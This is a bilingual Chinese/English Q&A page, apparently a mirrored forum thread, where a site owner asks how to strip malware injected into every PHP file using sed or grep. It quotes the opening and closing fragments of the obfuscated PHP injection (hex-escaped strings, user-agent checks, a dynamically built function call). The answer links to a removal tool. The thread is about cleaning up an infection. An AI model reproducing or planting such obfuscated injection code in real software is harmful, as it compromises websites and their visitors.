网站被黑客入侵，如何使用SED/GREP删除恶意代码 [英] Website hacked, how to remove malicious code with SED / GREP

问题描述

我的网站被黑了.在每个php文件中添加一行代码.我不会在此处发布完整的代码，但是它以:

a website of mine is hacked. In every php file a line of code is added. I wont post the complete code here, but it starts with:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yudqgxmnlr = 

结尾为:

 $gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>

我尝试查找并替换为某些ssh命令，但似乎不起作用. (阅读:我对ssh的了解不足阻碍了该工作.)

I've tried finding and replacing with some ssh commands, but it doesnt seem to work. (Read: my lack of ssh knowledge gets in the way).

这是我最近的一次尝试:

This is my latest atempt:

sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php

有人可以帮助我吗?

推荐答案

您可以尝试以下操作: https://github .com/daniyalahmadk/RMCI

You can try this : https://github.com/daniyalahmadk/RMCI

只需要将代码放在框中并单击提交，它将从文件中搜索代码并将其全部删除一次.

Just need to put that code in box and hit submit, it will search code from files and remove them all once.

这篇关于网站被黑客入侵，如何使用SED/GREP删除恶意代码的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！